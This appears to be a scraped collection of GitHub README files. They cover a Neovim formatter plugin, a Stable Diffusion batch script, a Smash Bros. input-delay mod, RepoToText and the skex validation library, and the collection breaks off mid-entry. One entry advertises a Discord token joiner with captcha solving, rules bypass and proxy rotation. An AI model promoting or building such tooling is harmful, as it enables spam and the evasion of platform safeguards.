```lua require("format").setup({ allow_update_if_buf_changed = false, -- function to calculate path of the temp file temp_file = function(file_path) local core = require("core") local new_file_path = core.file.dir(file_path) .. "/_" .. core.file.name(file_path) .. "." .. core.file.extension(file_path) return new_file_path end, hooks = { ---@type fun(code: integer, signal: integer) | nil on_success = function() vim.notify("Formatting Succeed", vim.log.levels.INFO, { title = "Format" }) end, ---@type fun(err: string | nil, data: string | nil) | nil on_err = function() vim.notify("Formatting Failed", vim.log.levels.ERROR, { title = "Format" }) end, on_timeout = function() vim.notify("Formatting Timeout", vim.log.levels.ERROR, { title = "Format" }) end, }, filetypes = { -- see format configuration below lua = require("format.builtins.stylua"), rust = require("format.builtins.rustfmt"), javascript = require("format.builtins.prettier"), typescript = require("format.builtins.prettier"), -- ... }, }) ``` Format configuration sample. > You can debug your configuration with `on_err` option. ```lua javascript = function(file_path) return { -- the first task ---@class format.config ---@field cmd string ---@field args string[] ---@field options {env?: table<string, any>, cwd?: string, uid?: number, gid?: number, verbatim?: boolean, detached?: boolean, hide?: boolean, timeout?: number} | nil ---@field on_success fun(code: integer, signal: integer) | nil ---@field on_err fun(err: string | nil, data: string | nil) | nil ---@field ignore_err (fun(err: string | nil, data: string | nil): boolean) | nil { cmd = "prettier", args = { -- this plugin copies content of current buffer to a temporary file, and format this file, then write back to the buffer, thus, you need to make sure the formatter can write to the file "-w", file_path, }, -- some formatters may output to stderr when formatted successfully, use this function to ignore these errors ignore_err = function(err, data) return err == nil and data == nil end, }, -- the second task { cmd = "eslint", args = { "--fix", file_path, }, -- just try to fix error with eslint, ignore the errors whether it succeed or not ignore_err = function() return true end, -- only the last task's `on_success` works -- all tasks's `on_err` works on_success = function() print("format success") end, }, } end ``` ## Example to use with lsp format This plugin has no lsp formatting feature built in. You can configure it like this to use both formatting functions at the same time. ```lua local filetypes_use_lsp_format = { "c", "cpp", } local format = function() local core = require("core") if core.lua.list.includes(filetypes_use_lsp_format, function(filetype) return filetype == vim.bo.filetype end) then vim.lsp.buf.format() else require("format").format() end end ```
25
1
ayushr6/sd-webui-automation
https://github.com/ayushr6/sd-webui-automation
Easlisy generate images using a datasets/list of prompts, using the automation script for Stable Diffusion web ui.
# Automatic1111-webui Automation A `python automated script` to automate the [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui), so to ease the task to `generate thousands of images`, in one go, with the help of `csv`. ## Step 1 - Clone: - for HTTPS: ``` git clone https://github.com/AUTOMATIC1111/stable-diffusion-webui.git ``` - for SSH: ``` git clone [email protected]:AUTOMATIC1111/stable-diffusion-webui.git ``` ## Step 2 - Installation and Running: Follow the setps provided in the [README](https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/master/README.md) to install and run `AUTOMATIC1111 - stable diffusion webui` Note 1: After successfull installation, run the webui with the `api` flag, as follows:- ``` bash webui.sh --api ``` Note 2: After successfully running the webui, note down the `URL` at which the webui is running. For e.g. Running on local URL: http://127.0.0.1:7860 #### Important: Do not close or exit the terminal, using which sd-webui is running ## Step 3 - Clone this repo (in another terminal) - for HTTPS: ``` git clone https://github.com/ayushr6/sd-webui-automation.git ``` - for SSH: ``` git clone [email protected]:ayushr6/sd-webui-automation.git ``` ## Step 4 - Install required Libraries - cd `sd-webui-automation` run: ``` pip install -r requirements.txt ``` ## Step 5 - Setup and Running Script #### To list all available models on you end, run the following command: ``` python generate_images.py print_available_models ``` ### There are two ways through which you can generate images: #### 1. using `two csv` files: - one, which contains the unique name of actors, items, animals, etc. - second, which contains `prompts`, which contains special characters which can be `replaced by` the name of a character, item, animal, etc from the initial csv. Note:- The second `csv` must also contain the following parameters, `replace_with`, `model_name`, `sampling_method`, `sampling_steps`, `cfg_scale`, and `batch_count`. for e.g. ``` first - tiny cute #### toy, soft smooth lighting, soft pastel colors, 3d blender render second - tiger or camel or any other animal name prompt = tiny cute tiger toy, soft smooth lighting, soft pastel colors, 3d blender render ``` This how, we can use `two csvs` to generate images for a list of characters, animals, etc. and use different prompts for each keyword. #### Run: for webui: ``` python generate_images.py generate_images_from_two_csv --input_csv "input/animals.csv" --prompt_csv "input/animals_prompts.csv" --headless False --output_dir "output/animals" ``` for api: ``` python generate_images.py generate_images_from_two_csv --input_csv "input/animals.csv" --prompt_csv "input/animals_prompts.csv" --use api --output_dir "output/animals" ``` ### Parameters Parameter | Definition ------------------------- | ----------------------------------------------------- `--input_csv` | `path` to `input_csv` `--prompt_csv` | `path` to `prompt_csv` `--webui_url` | `url` at which `automatic1111-webui` is running `--model` | sd model name (e.g. sd-v1-4) `--output_dir` | path to output_dir `--sampling_method` | sampling method name (e.g. Eular a, DDIM, etc.) `--sampling_steps` | sampling steps (1 - 150) `--batch_count` | number of images in one batch (1 - 100) `--cfg_scale` | cfg scale (1 - 30) `--use` | accepted values (webui/api) `--headless` | run webui in headless mode? (True/False) `--add_on` | overwrite existing content or not (`True` / `False`) #### 2. using a `single csv` file: - This file contains prompts, respect to while we need to generate the images. Note:- This `csv` must also contain the following parameters, `replace_with`, `model_name`, `sampling_method`, `sampling_steps`, `cfg_scale`, and `batch_count`. for e.g. ``` prompt - tiny cute tiger toy, soft smooth lighting, soft pastel colors, 3d blender render ``` This how, we can use `two csvs` to generate images for a list of characters, animals, etc. and use different prompts for each keyword. #### Run: for webui: ``` python generate_images.py generate_images_from_single_csv --prompt_csv "input/famous_structures.csv" --headless False --output_dir "output/famous_structures" ``` for api: ``` python generate_images.py generate_images_from_single_csv --prompt_csv "input/famous_structures.csv" --use api --output_dir "output/famous_structures" ``` ### Parameters Parameter | Definition ------------------------- | ----------------------------------------------------- `--prompt_csv` | `path` to `prompt_csv` `--webui_url` | `url` at which `automatic1111-webui` is running `--model` | sd model name (e.g. sd-v1-4) `--output_dir` | path to output_dir `--sampling_method` | sampling method name (e.g. Eular a, DDIM, etc.) `--sampling_steps` | sampling steps (1 - 150) `--batch_count` | number of images in one batch (1 - 100) `--cfg_scale` | cfg scale (1 - 30) `--use` | accepted values (webui/api) `--headless` | run webui in headless mode? (True/False) `--add_on` | overwrite existing content or not (`True` / `False`) `CFG Scale` : a parameter that controls how much the generated image matches the text prompt and/or the input image. A higher CFG scale value results in an output image more in line with the input prompt or image, but at the expense of quality. Conversely, a lower CFG scale value produces a better-quality image that may differ from the original prompt or image. `Sampling Method/Samplers` : Samplers are used to tell the AI how it should start generating visual patterns from the initial noise. NovelAI supports a wide variety of Sampling Methods: DPM++ 2M, Euler Ancestral, Euler, DPM2, DPM++ 2S Ancestral, DPM++ SDE, DPM Fast, and DDIM. (Note: Refer to webui to see list of all samplers) `Sampling Steps` : Sampling steps is the number of iterations that Stable Diffusion runs to go from random noise to a recognizable image based on the text prompt.
10
0
blu-dev/less-delay
https://github.com/blu-dev/less-delay
A mod for SSBU that removes 1 frame of input delay
# Less Input Delay This is a **software modification** to Super Smash Bros. Ultimate that removes 1 frame of input delay. This is performed by disabling graphical vsync and manually timing the game's core logic to run on the vsync timer. ## Installation You can install this by grabbing the latest `libless_delay.nro` file from this repository's Releases page and placing it here: `sd:/atmosphere/contents/01006A800016E000/romfs/skyline/plugins/libless_delay.nro` You will also need skyline, which you can find from basically any Ultimate modding tutorial. ## Pitfalls On some stages/some matchups/some characters, when the graphics pipeline is getting flooded with rendering commands, you **may** encounter purely visual frame drops. These frame drops, as I just said, are entirely visual. I have been playing with this for 3 weeks and have encountered absolutely zero noticeable frame drops. You **will** encounter some form of frame drops when recording or streaming using SysDVR/SysDVR-patches. These are unavoidable and can be reduced by dropping your recording framerate from 60fps -> 30fps or disabling them entirely. ## Wifi Safeness? This is a client side mod that changes the graphics pipeline in a very slight way. Because it is client side, this will work online in all capacities and offline in all capacities. I do not recommend using this to practice offline unless the tournaments that you go to are also running this mod because you'll quickly realize how much you hate that extra 1 frame (well maybe not in Ultimate's engine, but it's very noticeable in HDR which this was originally developed for). ## Visual indicator for wifi brackets? I didn't care this time around, there will be no visual indicator. It is indicated to me that Ultimate players do not care about online competitive integrity as there have been numerous forks of the original source code for my online arena latency slider that allow for disabling the arena UI text that says you have it. ## Enjoy playing a faster game!
30
0
H4cK3dR4Du/Discord-Token-Joiner
https://github.com/H4cK3dR4Du/Discord-Token-Joiner
The best token joiner for Discord, with captcha solver, rules bypass, and nickname changer (optional)!
# Discord Token Joiner 🪐 The best token joiner for Discord, with captcha solver, rules bypass, and nickname changer (optional)! ## 📹 Preview https://github.com/H4cK3dR4Du/Crunchyroll-Account-Checker/assets/118562174/344619ae-883c-40bd-a805-297db331cd31 ## 🔥 Features - Fully Requests Based Joiner - Fastest Discord Token Joiner - HTTP & HTTPS Proxy Support - Multi Proxy Support - Captcha Solver - Nickname Changer - Bypass Rules - Doesn't Flag Any Token - Slick UI - Simple & Easy To Setup ## ✍️ Usage 1. Edit `proxies.txt` file and set your proxies 2. Edit `config.json` with your custom settings 3. Open `main.py` and enjoy! :) ## ⚠️ DISCLAIMER / NOTES This github repo is for EDUCATIONAL PURPOSES ONLY. I am NOT under any responsibility if a problem occurs. I have made this GitHub repository in just 2 hours. If there is any issue, please contact me through my Discord. ## ✨ Issues / Doubts - If you have any questions do not hesitate to enter my discord: https://discord.gg/hcuxjpSfkU - Or if you have any error do not forget to report it in: [issues](https://github.com/H4cK3dR4Du/Discord-Token-Joiner/issues/new)
14
2
JeremiahPetersen/RepoToText
https://github.com/JeremiahPetersen/RepoToText
Turn an entire GitHub Repo into a single organized .txt file to use with Code Interpreter
![example workflow](https://github.com/JeremiahPetersen/RepoToText/actions/workflows/pylint.yml/badge.svg) ![example workflow](https://github.com/JeremiahPetersen/RepoToText/actions/workflows/es-lint.yml/badge.svg) ![repo to text 5](https://github.com/JeremiahPetersen/RepoToText/assets/118206017/0d65016d-6388-48e0-b833-4ea1a169acfe) ![repo to text 7](https://github.com/JeremiahPetersen/RepoToText/assets/118206017/7d28fa8f-8bb1-4ddd-99f3-b33ddb26f0e9) ## RepoToText RepoToText is a web app that scrapes a GitHub repository and converts its files into a single organized .txt. It allows you to enter the URL of a GitHub repository and an optional documentation URL (the doc info will append to the top of the .txt). The app retrieves the contents of the repository, including all files and directories and also fetches the documentation from the provided URL and includes it in a single organized text file. The .txt file will be saved in the root project directory with user/repo/timestamp info. This file can then be uploaded to Code Interpreter and you can use the chatbot to interact with the entire GitHub repo. Add your GitHub API Key in the .env file GITHUB_API_KEY='YOUR GITHUB API KEY HERE' ## Prompt Example This is a .txt file that represents an entire GitHub repository. The repository's individual files are separated by the sequence '''--- , followed by the file path, ending with ---. Each file's content begins immediately after its file path and extends until the next sequence of '''--- *Add your idea here (Example)*: Please create a react front end that will work with the back end ## FolderToText FolderToText.py is a script that allows you to turn a local folder, or local files, into a .txt in the same way RepoToText.py does. Choose your files with browse (you can continue adding by clicking "Browse". Once you have all of your files selected and uploaded with browse, type in the file type endings you want to copy with a ',' in between. Example: .py , .js , .md , .ts ---> You can also turn this off and it will add every file you uploaded to the .txt ---> Last, enter in the file name you want to appear and the output path. The file will be written with your file name choice and a timestamp. ## Info - creates a.txt with ('''---) seperating each file from the repo. - each file from the repo has a header after ('''---) with the file path as the title - the .txt file is saved in the root directory - you can add a url to a doc page and the doc page will append to the top of the .txt file (great to use for tech that came out after Sep 2021) ## Tech Used - Frontend: React.js - Backend: Python Flask - GitHub API: PyGithub library - Additional Python libraries: beautifulsoup4, requests, flask_cors, retry ## Frontend The frontend of the app is implemented using React.js. The main component is `App.js`, which handles user input and interacts with the backend API. ### App.js This file defines the main React component of the app. It uses React hooks to manage the state of input fields and the response received from the backend. - `useState` hooks are used to define the state variables `repoUrl`, `docUrl`, and `response`, which hold the values of the repository URL, documentation URL, and the response from the backend API, respectively. - The component defines event handlers (`handleRepoChange`, `handleDocChange`, `handleSubmit`, and `handleCopyText`) to update the state variables based on user interactions. - When the user clicks the "Submit" button, the `handleSubmit` function is called. It sends a POST request to the backend API using the Axios library, passing the `repoUrl` and `docUrl` values in the request body. The response from the API is then stored in the `response` state variable. - The component renders the input fields, buttons, and the output area using JSX. ## Backend The backend of the application is implemented using Python and the Flask web framework. The main script is `RepoToText.py`, which defines the Flask application and handles the scraping and conversion logic. ### RepoToText.py This file contains the Flask application and the `GithubRepoScraper` class responsible for scraping the GitHub repository and generating the text file. - The `GithubRepoScraper` class initializes with a GitHub API key and the repository URL. It provides methods to fetch all files from the repository, scrape documentation from a provided URL, write the files and documentation to a text file, and clean up the text file by removing unnecessary line breaks. - The Flask application is created using the `Flask` class and enables Cross-Origin Resource Sharing (CORS) using the `CORS` extension. It defines a single route `/scrape` that accepts POST requests. - When a POST request is received at the `/scrape` endpoint, the request data is extracted and the repository URL and documentation URL are retrieved. - An instance of `GithubRepoScraper` is created with the repository URL and documentation URL. - The `run` method of `GithubRepoScraper` is called, which fetches all files from the repository, writes them to a text file along with the documentation, and performs cleanup on the text file. - The generated text file is read and returned as the response of the API. ## Running the Application To run the application, follow these steps: 1. Install the required dependencies mentioned in the frontend and backend sections. 2. Start the backend server by running the `RepoToText.py` script. The Flask application will listen on port 5000. 3. Start the frontend development server by running the React application. 4. Access the application in a web browser and enter the GitHub repository URL and documentation URL (if available). 5. Choose All files or choose specific file types. 6. Click the "Submit" button to initiate the scraping process. The converted text will be displayed in the output area, and it will also be saved to the project root directory. 7. You can also click the "Copy Text" button to copy the generated text to the clipboard. ## TODO - [ ] FIX: Broken file types: .ipynb | - [ ] FIX: FolderToText - fix so a user can pick one folder (currently only working when user selects individual files - [ ] add in the ability to work with private repositories - [ ] create a small desktop app via PyQT or an executable file - [ ] add ability to store change history and update .txt to reflect working changes - [ ] add checker function to make sure .txt is current repo version - [ ] adjust UI for flow, including change textarea output width, adding file management and history UI - [ ] explore prompt ideas including breaking the prompts into discrete steps that nudge the model along
61
6
fabiospampinato/skex
https://github.com/fabiospampinato/skex
A modern schema validation and filtration library with great TypeScript support.
# Skex A modern schema validation and filtration library with great TypeScript support. ## Install ```sh npm install --save skex ``` ## APIs | [Primitive Ops](#primitive-ops) | [Compound Ops](#compound-ops) | [Type Ops](#type-ops) | [Utilities](#utilities) | [Types](#types) | | ------------------------------- | ----------------------------- | --------------------- | ----------------------------- | ------------------- | | [`bigint`](#bigint) | [`array`](#array) | [`any`](#any) | [`serialize`](#serialize) | [`Infer`](#infer) | | [`boolean`](#boolean) | [`tuple`](#tuple) | [`unknown`](#unknown) | [`deserialize`](#deserialize) | [`Schema`](#schema) | | [`null`](#null) | [`object`](#object) | | | | | [`number`](#number) | [`record`](#record) | | | | | [`string`](#string) | [`nillable`](#nillable) | | | | | [`symbol`](#symbol) | [`nullable`](#nullable) | | | | | [`undefined`](#undefined) | [`optional`](#optional) | | | | | | [`and`](#and) | | | | | | [`or`](#or) | | | | ## Usage This library provides various operators, or "ops" for short, which are the building blocks used to construct a schema. A schema is a graph of operators, which are the nodes in this graph. Each operator has various chainable immutable APIs used to customize it, and it can have a default value and a description. The main methods that each operator has, which are also the main functionality of this library, are: - `test`: the test method basically uses a schema as a type guard, it tells you if an arbitrary value matches the schema structurally according to TypeScript, i.e. like in TypeScript extra properties are allowed as long as the type of the schema matches. The input value is not mutated in any way. - `filter`: the filter method basically tries to extract the biggest subset of the input value that matches the schema. For example imagine you have a schema for your app's settings, you want to get all the valid settings out of the object, but if there happens to be an invalid setting in the object that shouldn't cause the entire object to be considered invalid. Basically invalid properties are deleted from the input object until what remains is a valid object, or an error is thrown if that's not possible. The input object can be mutated, even if the call ultimately ends up throwing an error. - `traverse`: the traverse method allows you to do something for each operator node found traversing the given node. This is fairly powerful but a bit of a niche and escape-hatch kind of feature. Some basic examples: ```ts import {boolean, number, object, string} from 'skex'; // Let's create a simple schema that matches a number between 0 and 10 inclusive const schema1 = number ().min ( 0 ).max ( 10 ); // Schemas are immutable, they are cloned when made more specific schema1.multipleOf ( 5 ) !== schema1; // => true // Almost every operator supports all of the following APIs schema1.anyOf ([ 1, 2, 3 ]); // Allow only the provided values schema1.noneOf ([ 1, 2, 3 ]); // Disallow the provided values schema1.nillable (); // Allows for matching also null | undefined schema1.nullable (); // Allows for matching also null schema1.optional (); // Allows for matching also undefined schema1.default ( 123 ); // Sets a default value to fallback to when filtering and receiving an invalid input schema1.description ( 'Some description' ); // Set a description for this schema // Configuring multiple identical modifiers on the same schema is disallowed and will case the library to throw schema1.multipleOf ( 5 ).multipleOf ( 10 ); // => throws an error // The internal state of each operator can be retrieved schema1.get (); // => { min: 0, max: 10 } schema1.get ( 'min' ); // => 0 schema1.get ( 'max' ); // => 10 schema1.get ( 'multipleOf' ); // => undefined // Let's test if an arbitrary input matches this schema schema1.test ( 0 ); // => true schema1.test ( 5 ); // => true schema1.test ( 10 ); // => true schema1.test ( 100 ); // => false schema1.test ( -10 ); // => false schema1.test ( 'abc' ); // => false // Let's filter an input according to this schema, which for primitive ops effectively means throwing if the input doesn't match schema1.filter ( 0 ); // => 0 schema1.filter ( 5 ); // => 5 schema1.filter ( 10 ); // => 10 schema1.filter ( 100 ); // => throws an error schema1.filter ( -10 ); // => throws an error schema1.filter ( 'abc' ); // => throws an error // Let's filter the input according to the schema, like .filter, but without throwing, like .test const isFiltered = schema1.filter ( 10, false, true ); // Let's create a more complicated schema for matching settings // Notice how every property is also marked as optional, as we don't want to throw out the entire input object if a single one of these properties is missing or invalid const schema2 = object ({ editor: object ({ autosave: object ({ enabled: boolean ().default ( true ).description ( 'Whether autosaving is enabled or not' ).optional (), interval: number ().default ( 60_000 ).description ( 'The mount of time to wait between autosaves' ).optional () }).optional (), cursor: object ({ animated: boolean ().default ( false ).description ( 'Whether the cursor should move smoothly between positions or not' ).optional (), blinking: string ().anyOf ([ 'blink', 'smooth', 'phase', 'expand', 'solid' ]).default ( 'blink' ).description ( 'The style used for blinking cursors' ).optional (), style: string ().anyOf ([ 'line', 'block', 'underline' ]).default ( 'line' ).description ( 'The style used for rendering cursors' ).optional () }).optional () }).optional () }); // Let's match some objects against this more complicated schema schema2.test ( {} ); // => true schema2.test ({ // => true editor: { autosave: { enabled: true } } }); schema2.test ({ // => true editor: { cursor: { animated: true, blinking: 'phase', style: 'underline' } }, extraProperty: { whatever: true } }); schema2.test ({ // false editor: { cursor: { animated: 'nope' } } }); schema2.test ({ // false editor: { cursor: { blinking: 'no-blinking' } } }); // Let's filter an object against this more complicate schema const filtered = schema2.filter ({ editor: { cursor: { animated: true, blinking: 'phase', style: 'pixelated' } }, extraProperty: { whatever: true } }); // { // editor: { // cursor: { // animated: true, // blinking: 'phase' // } // } // } // Let's traverse this schema schema2.traverse ( ( child, parent, key ) => { console.log ( 'current node:', child ); // Callback called once for each operator node ("child" here) in the graph console.log ( 'parent node:', parent ); // All nodes have a parent except for the root one being traversed console.log ( 'parent key:', key ); // Some child nodes have a parent but they are not attached on a key on the parent, like schemas passed to the "and" operator }); ``` ## Primitive Ops Primitive operators are the leaf nodes in your schema graph, they don't take any other operators as input, they just match a single value. #### `bigint` This op matches a single [BigInt](https://developer.mozilla.org/en-US/docs/Glossary/BigInt). ```ts import {bigint} from 'skex'; bigint (); // Matches a bigint bigint ().gt ( 5n ); // Matches a bigint that is > 5n bigint ().gte ( 5n ); // Matches a bigint that is >= 5n bigint ().min ( 5n ); // Matches a bigint that is >= 5n bigint ().lt ( 5n ); // Matches a bigint that is < 5n bigint ().lte ( 5n ); // Matches a bigint that is <= 5n bigint ().max ( 5n ); // Matches a bigint that is <= 5n bigint ().multipleOf ( 5n ); // Matches a bigint that is a multiple of 5n bigint ().anyOf ([ 1n, 2n, 3n ]); // Matches a bigint that is either 1n, 2n or 3n bigint ().noneOf ([ 1n, 2n, 3n ]); // Matches a bigint that is neither 1n, 2n nor 3n bigint ().nillable (); // Matches bigint | null | undefined bigint ().nullable (); // Matches bigint | null bigint ().optional (); // Matches bigint | undefined ``` #### `boolean` This op matches a single [Boolean](https://developer.mozilla.org/en-US/docs/Glossary/Boolean). ```ts import {boolean} from 'skex'; boolean (); // Matches a boolean boolean ().anyOf ([ true ]); // Matches a boolean that is true boolean ().noneOf ([ true ]); // Matches a boolean that is not true boolean ().nillable (); // Matches boolean | null | undefined boolean ().nullable (); // Matches boolean | null boolean ().optional (); // Matches boolean | undefined ``` #### `null` This op matches a single [Null](https://developer.mozilla.org/en-US/docs/Glossary/Null). ```ts import {null} from 'skex'; null (); // Matches null null ().optional (); // Matches null | undefined ``` #### `number` This op matches a single [Number](https://developer.mozilla.org/en-US/docs/Glossary/Number). ```ts import {number} from 'skex'; number (); // Matches a number number ().finite (); // Matches a finite number (no Infinity) number ().gt ( 5 ); // Matches a number that is > 5 number ().gte ( 5 ); // Matches a number that is >= 5 number ().min ( 5 ); // Matches a number that is >= 5 number ().integer (); // Matches an integer number ().lt ( 5 ); // Matches a number that is < 5 number ().lte ( 5 ); // Matches a number that is <= 5 number ().max ( 5 ); // Matches a number that is <= 5 number ().multipleOf ( 5 ); // Matches a number that is a multiple of 5 number ().anyOf ([ 1, 2, 3 ]); // Matches a number that is either 1, 2 or 3 number ().noneOf ([ 1, 2, 3 ]); // Matches a number that is neither 1, 2 nor 3 number ().nillable (); // Matches number | null | undefined number ().nullable (); // Matches number | null number ().optional (); // Matches number | undefined ``` #### `string` This op matches a single [String](https://developer.mozilla.org/en-US/docs/Glossary/String). ```ts import {string} from 'skex'; string (); // Matches a string string ().length ( 3 ); // Matches a string of length === 3 string ().min ( 3 ); // Matches a string of length <= 3 string ().max ( 3 ); // Matches a string of length >= 3 string ().matches ( /abc/i ); // Matches a string that matches the regex string ().matches ( isLowercase ); // Matches a string for which this function returns true string ().anyOf ([ 'a', 'b', 'c' ]); // Matches a string that is either 'a', 'b' or 'c' string ().noneOf ([ 'a', 'b', 'c' ]); // Matches a string that is neither 'a', 'b' nor 'c' string ().nillable (); // Matches string | null | undefined string ().nullable (); // Matches string | null string ().optional (); // Matches string | undefined ``` #### `symbol` This op matches a single [Symbol](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol). ```ts import {symbol} from 'skex'; symbol (); // Matches a symbol symbol ().anyOf ([ Symbol.iterator, Symbol.asyncIterator ]); // Matches a symbol that is either Symbol.iterator or Symbol.asyncIterator symbol ().noneOf ([ Symbol.iterator, Symbol.asyncIterator ]); // Matches a symbol that is neither Symbol.iterator nor Symbol.asyncIterator symbol ().nillable (); // Matches symbol | null | undefined symbol ().nullable (); // Matches symbol | null symbol ().optional (); // Matches symbol | undefined ``` #### `undefined` This op matches a single [Undefined](https://developer.mozilla.org/en-US/docs/Glossary/Undefined). ```ts import {undefined} from 'skex'; undefined (); // Matches undefined undefined ().nullable (); // Matches undefined | null ``` ## Compound Ops Compound operators are the internal nodes in your schema graph, they take as input other operators, and combine them to create more complicated schemas. #### `array` This op matches a single [Array](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array), optionally matching all of its items against another schema. ```ts import {array, number} from 'skex'; array (); // Matches an array with any items array ( number () ); // Matches an array with number items array ().length ( 3 ); // Matches an array of length === 3 array ().min ( 3 ); // Matches an array of length <= 3 array ().max ( 3 ); // Matches an array of length >= 3 array ().items ( number () ); // Matches an array with number items array ().anyOf ([ [1, 2], ['a', 'b'] ]); // Matches an array that is either [1, 2] or ['a', 'b'] array ().noneOf ([ [1, 2], ['a', 'b'] ]); // Matches an array that is neither [1, 2] nor ['a', 'b'] array ().nillable (); // Matches unknown[] | null | undefined array ().nullable (); // Matches unknown[] | null array ().optional (); // Matches unknown[] | undefined ``` #### `tuple` This op matches a single [Array](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array), but where the exact type and index of each item in the array is matched explicit also. ```ts import {tuple, boolean, number, string} from 'skex'; tuple (); // Matches an array with any items tuple ([ number (), string (), boolean () ]); // Matches [number, string, boolean] tuple ([ number (), string ().optional () ]) // Matches [number, string] | [number, undefined] | [number] tuple ().length ( 3 ); // Matches an array of length === 3 tuple ().min ( 3 ); // Matches an array of length <= 3 tuple ().max ( 3 ); // Matches an array of length >= 3 tuple ().items ([ number (), string () ]); // Matches [number, string] tuple ().anyOf ([ [1, 2], ['a', 'b'] ]); // Matches an array that is either [1, 2] or ['a', 'b'] tuple ().noneOf ([ [1, 2], ['a', 'b'] ]); // Matches an array that is neither [1, 2] nor ['a', 'b'] tuple ().nillable (); // Matches unknown[] | null | undefined tuple ().nullable (); // Matches unknown[] | null tuple ().optional (); // Matches unknown[] | undefined ``` #### `object` This op matches a single [Plain Object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object), optionally matching each explicitly provided property with a specific schema. ```ts import {object, number, string} from 'skex'; object (); // Matches an object with any properties object ({ foo: number ().optional (), bar: string ().optional () }); // Matches { foo?: number, bar?: string } object ().properties ({ foo: number () }); // Matches { foo: number } object ().anyOf ([ { foo: 123 }, { bar: 'abc' } ]); // Matches an object that is either { foo: 123 } or { bar: 'abc' } object ().noneOf ([ { foo: 123 }, { bar: 'abc' } ]); // Matches an object that is neither { foo: 123 } nor { bar: 'abc' } object ().nillable (); // Matches {} | null | undefined object ().nullable (); // Matches {} | null object ().optional (); // Matches {} | undefined ``` #### `record` This op matches a single [Plain Object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object), where all values, and optionally all keys also, are matches against specific schemas. ```ts import {record, number, string} from 'skex'; record (); // Matches an object with any properties record ( number () ); // Matches a Record<string, number> record ( string ().min ( 3 ), number () ); // Matches a Record<string, number> where keys' lengths are >= 3 record ().anyOf ([ { foo: 123 }, { bar: 'abc' } ]); // Matches an object that is either { foo: 123 } or { bar: 'abc' } record ().noneOf ([ { foo: 123 }, { bar: 'abc' } ]); // Matches an object that is neither { foo: 123 } nor { bar: 'abc' } record ().nillable (); // Matches Record<string, unknown> | null | undefined record ().nullable (); // Matches Record<string, unknown> | null record ().optional (); // Matches Record<string, unknown> | undefined ``` #### `nillable` This op accepts [Undefined](https://developer.mozilla.org/en-US/docs/Glossary/Undefined) and [Null](https://developer.mozilla.org/en-US/docs/Glossary/Null) additionally to the type matched by the provided schema. ```ts import {nillable, number} from 'skex'; nillable ( number () ); // Matches number | null | undefined ``` #### `nullable` This op accepts [Null](https://developer.mozilla.org/en-US/docs/Glossary/Null) additionally to the type matched by the provided schema. ```ts import {nullable, number} from 'skex'; nullable ( number () ); // Matches number | null ``` #### `optional` This op accepts [Undefined](https://developer.mozilla.org/en-US/docs/Glossary/Undefined) additionally to the type matched by the provided schema. ```ts import {optional, number} from 'skex'; optional ( number () ); // Matches number | undefined ``` #### `and` This op matches multiple schemas on the same value at the same time. ```ts import {and, number, object, string} from 'skex'; and ([ string ().matches ( /aaa/ ), string ().matches ( /bbb/ ) ]); // Matches a string that matches both regexes and ([ object ({ foo: number () }), object ({ bar: string () }) ]); // Matches { foo: number, bar: string } and ([ object ({ foo: number () }), object ({ bar: string () }) ]).anyOf ([ { foo: 1, bar: 'a' }, { foo: 2, bar: 'b' } ]); // Matches { foo: number, bar: string } but only if { foo: 1, bar: 'a' } or { foo: 2, bar: 'b' } and ([ object ({ foo: number () }), object ({ bar: string () }) ]).noneOf ([ { foo: 1, bar: 'a' }, { foo: 2, bar: 'b' } ]); // Matches { foo: number, bar: string } but only if not { foo: 1, bar: 'a' } nor { foo: 2, bar: 'b' } and ([ object ({ foo: number () }), object ({ bar: string () }) ]).nillable (); // Matches { foo: number, bar: string } | null | undefined and ([ object ({ foo: number () }), object ({ bar: string () }) ]).nullable (); // Matches { foo: number, bar: string } | null and ([ object ({ foo: number () }), object ({ bar: string () }) ]).optional (); // Matches { foo: number, bar: string } | undefined ``` #### `or` This op matches at least one of the provided schemas on the provided value. ```ts import {or, number, string} from 'skex'; or ([ string (), number () ]); // Matches string | number or ([ string (), number () ]).anyOf ([ 1, 2, 'a', 'b' ]); // Matches a string | number that is either 1, 2, 'a' or 'b' or ([ string (), number () ]).noneOf ([ 1, 2, 'a', 'b' ]); // Matches a string | number that is neither 1, 2, 'a' nor 'b' or ([ string (), number () ]).nillable (); // Matches string | number | null | undefined or ([ string (), number () ]).nullable (); // Matches string | number | null or ([ string (), number () ]).optional (); // Matches string | number | undefined ``` ## Type Ops Special primitive operators that match values with a specific TypeScript-only type. #### `any` This op matches any value, and it asserts it's value to be of type `any`. ```ts import {any} from 'skex'; any (); // Matches anything as any any ().anyOf ([ 1, 2, 3 ]); // Matches anything as any, but allows only 1, 2 or 3 any ().noneOf ([ 1, 2, 3 ]); // Matches anything as any, but disallows 1, 2 and 3 ``` #### `unknown` This op matches any value, and it asserts it's value to be of type `unknown`. ```ts import {unknown} from 'skex'; unknown (); // Matches anything as unknown unknown ().anyOf ([ 1, 2, 3 ]); // Matches anything as unknown, but allows only 1, 2 or 3 unknown ().noneOf ([ 1, 2, 3 ]); // Matches anything as unknown, but disallows 1, 2 and 3 ``` ## Utilities Utilities are not operators, so they are not part of your schemas, but they do useful things with your schemas. #### `serialize` This utility serializes an arbitrary schema to a string. Any schema can be serialized to a string, unless it references symbols or functions, since those can't always be serialized to a string. Among other things serialization can be used to pass a schema between different worker threads. ```ts import {serialize, number} from 'skex'; serialize ( number ().min ( 3 ) ); // => '{"$$schema":"number","$$state":{"gte":3}}' ``` #### `deserialize` This utility deserializes a serialized schema back to into a usable schema. Any serialized schema can be deserialized, unless you are using custom schema ops (for now). ```ts import {serialize, deserialize, number} from 'skex'; const serialized = serialize ( number ().min ( 3 ) ); // => '{"$$schema":"number","$$state":{"gte":3}}' const deserialized = deserialize ( serialized ); // => Basically a clone of number ().min ( 3 ) ``` ## Types The following types are provided to better use the library. #### `Infer` This type allows you to extract the type that a schema matches. Basically it allows you to convert a schema into a type. Interface: ```ts type Infer<T extends Schema> = ReturnType<T['filter']>; ``` Usage: ```ts import {number, object, string} from 